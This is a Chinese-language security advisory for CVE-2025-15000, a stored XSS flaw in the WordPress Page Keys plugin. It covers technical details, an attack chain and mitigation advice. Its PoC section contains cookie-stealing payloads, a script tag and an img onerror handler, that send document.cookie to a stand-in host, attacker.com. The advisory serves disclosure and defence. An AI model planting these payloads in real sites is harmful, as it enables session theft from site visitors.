IPBUF安全漏洞报告
English
CVE-2025-15000 CVSS 4.4 中危

CVE-2025-15000 WordPress Page Keys插件存储型XSS漏洞

披露日期: 2026-01-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-15000
漏洞类型
存储型跨站脚本攻击(XSS)
CVSS评分
4.4 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
WordPress Page Keys插件

相关标签

存储型XSSWordPress插件漏洞CVE-2025-15000Page Keys跨站脚本攻击认证后攻击WordPress安全

漏洞概述

WordPress Page Keys插件1.3.3及以下所有版本存在存储型跨站脚本(XSS)漏洞。该漏洞源于插件在处理'page_key'参数时未进行充分的输入清理和输出转义。攻击者通过利用此漏洞,可以在受影响的WordPress页面中注入任意JavaScript脚本。由于是存储型XSS,恶意脚本会被永久保存在服务器端,所有访问被注入页面的用户都会执行这些恶意代码。此漏洞的利用需要攻击者具备管理员级别权限,并且仅影响多站点WordPress安装或已禁用unfiltered_html功能的单站点安装。

技术细节

Page Keys插件的ListTable.php文件(第260行附近)存在安全漏洞。在处理page_key参数时,插件直接使用用户输入而未进行适当的HTML转义。攻击者以管理员身份登录后,可通过插件管理界面在page_key字段中注入恶意JavaScript代码。由于插件未对输出进行转义,这些恶意脚本会被浏览器作为合法HTML/JS执行。存储型XSS的特点是payload持久化存储,每次页面加载时都会触发执行,攻击者可利用此窃取会话Cookie、劫持用户操作或进行钓鱼攻击。该漏洞的利用条件较为严格,要求攻击者具有高权限且目标站点为多站点安装或已禁用unfiltered_html功能。

攻击链分析

STEP 1
信息收集
攻击者确认目标网站使用WordPress并安装了Page Keys插件,版本≤1.3.3
STEP 2
权限获取
攻击者通过钓鱼、密码爆破或其他方式获取WordPress管理员账户凭据
STEP 3
漏洞探测
攻击者访问Page Keys插件管理界面,找到page_key参数输入点
STEP 4
恶意代码注入
在page_key字段中注入包含XSS payload的恶意代码,如<script>标签或事件处理器
STEP 5
持久化存储
保存配置后,恶意代码被永久存储在数据库中
STEP 6
触发执行
受害者访问包含恶意page_key的页面时,浏览器执行注入的JavaScript代码
STEP 7
攻击成功
攻击者通过XSS payload窃取会话Cookie、劫持用户操作或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- WordPress Page Keys Plugin XSS PoC --> <!-- Requires: Admin privileges, Multi-site or unfiltered_html disabled --> <!-- Malicious page_key payload --> <script> // Cookie stealing payload var cookie = document.cookie; fetch('https://attacker.com/steal?c=' + btoa(cookie), { mode: 'no-cors' }); </script> <!-- Alternative payload using event handlers --> <img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)"> <!-- Steps to exploit --> <!-- 1. Login as WordPress administrator --> <!-- 2. Navigate to Page Keys plugin settings --> <!-- 3. Create or edit a page key with XSS payload in the page_key parameter --> <!-- 4. Save the configuration --> <!-- 5. When any user visits pages with the malicious key, the script executes -->

影响范围

Page Keys插件 ≤ 1.3.3 (所有版本)

防御指南

临时缓解措施
如果无法立即升级,可临时禁用Page Keys插件,直到可用更新发布。对于必须使用的场景,确保WordPress核心的unfiltered_html功能未被禁用,并在服务器层面部署WAF规则过滤恶意脚本请求。同时限制具有管理员权限的用户数量,实施最小权限原则。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表